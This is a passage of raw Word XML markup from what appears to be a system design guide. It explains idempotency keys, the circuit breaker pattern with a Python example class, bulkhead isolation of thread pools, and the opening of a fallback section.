    <w:p w14:paraId="7FC3B9CB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Server checks: "Have I seen this ID before?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BBAA05" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    YES → return cached response (don't re-execute).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44762C4D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    NO → execute, store ID + response, return response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048E5F71" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="64F020E1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  POST /transfers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2A45BB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Idempotency-Key: 550e8400-e29b-41d4-a716-446655440000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC209A6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  {"from": "A", "to": "B", "amount": 100}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F902BD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EAF9E8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  First call: executes transfer, stores result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59820CAD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Retry (same key): returns stored result without re-transferring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2D290E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Circuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788CE09D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91E1D8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Problem: A downstream service is failing. Continuing to call it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A91EA38" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Wastes resources (threads blocked waiting for timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD33C83" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Adds latency (every request waits for timeout before failing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C54315" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Prevents the downstream from recovering (overwhelmed by requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAB6023" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="7F93DA94" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Circuit breaker: stop calling the failing service and fail immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663564FC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="29701641" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>States:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C127502" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>┌────────┐  failure threshold  ┌────────┐  timeout     ┌───────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1FACCF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ CLOSED │ ──────────────────→ │  OPEN  │ ───────────→ │HALF-OPEN  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09356E4C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│(normal)│                     │(failing)│              │(testing)   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D51F11" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>└────────┘ ←────────────────── └────────┘ ←──────────── └───────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4815B7A0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            success threshold               failure → back to OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043256E9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                            success → back to CLOSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3CDDB2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C11C038" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>class CircuitBreaker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4007F3EB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    def __init__(self, failure_threshold=5, recovery_timeout=30):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C255478" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.state = "CLOSED"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2627C2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.failure_count = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CFFEBD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.failure_threshold = failure_threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576C7A84" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.recovery_timeout = recovery_timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A4FC55" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        self.last_failure_time = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7135AE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0524FDCD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    def call(self, func):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77294DAD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        if self.state == "OPEN":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0695EC7F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            if time.time() - self.last_failure_time &gt; self.recovery_timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409E8759" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                self.state = "HALF_OPEN"  # Try one request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB388D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55753D2E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                raise CircuitOpenError("Service unavailable")  # Fail FAST (no waiting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB90440" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE4CC5E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D80DFB5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            result = func()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7412E703" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            if self.state == "HALF_OPEN":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14354A24" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                self.state = "CLOSED"  # Recovery confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B69F7DB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                self.failure_count = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B566FEB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E10384E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        except Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4CC914" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            self.failure_count += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCAB558" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            self.last_failure_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9BC9D5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            if self.failure_count &gt;= self.failure_threshold:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399ADA8E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                self.state = "OPEN"  # Too many failures → stop trying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF3BE7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            raise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3769B6E1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D99A4C9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1589"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:t>Fails FAST (no timeout wait — instant error when circuit is open).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A53A510" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1589"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:t>Gives downstream time to recover (no requests during open state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F01BF9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1589"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:t>Automatic recovery (half-open state tests if service is back).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576DEC08" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1589"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:t>Prevents resource exhaustion (no threads blocked on dead service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F04E12C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Bulkhead (Isolation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693F2EE5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F70632" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Analogy: Ship compartments (bulkheads). If one floods, others are sealed off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB5816F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="40334DED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Problem: Shared resources between different workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B414555" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Thread pool: 100 threads shared by all endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D8540" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  One endpoint's dependency is slow → consumes all 100 threads waiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBDCB02" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  ALL other endpoints fail (no threads available). Total outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B21CEA2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="5B0124EC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Solution: Isolate resources per workload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F2462D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="4A7B2163" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>┌──────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BCA229" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│                     Shared Thread Pool                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA5FEE0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  [All 100 threads consumed by /slow-endpoint]                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2F9424" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  /fast-endpoint → NO THREADS AVAILABLE → FAILS!              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32530ED5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>└──────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376CCEA1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="643FDABE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>vs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B78637" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="1BA4A1A2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>┌──────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D9796E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  /critical-endpoint pool (50 threads)    │ Always available  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53142B11" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C512EA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  /slow-endpoint pool (30 threads)        │ Isolated failure  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E73742C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3C9BAB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  /other pool (20 threads)                │ Unaffected        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562CC750" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>└──────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE719E3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Types of bulkheads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D8DA6D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1590"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thread pool isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t> Separate thread pools per dependency/endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644073F1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1590"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection pool isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t> Separate DB connection pools per feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ACD76B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1590"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t> Critical functions in separate processes/containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD0E8CE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1590"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t> Critical functions in separate microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558004DF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1590"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Infrastructure isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t> Separate clusters for different tiers (e.g., payment on dedicated nodes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B47B747" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5 Fallback (Graceful Degradation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794EF794" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657CF255" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>When a component fails, provide a degraded but functional alternative:</w:t>
      </w:r>
    </w:p>
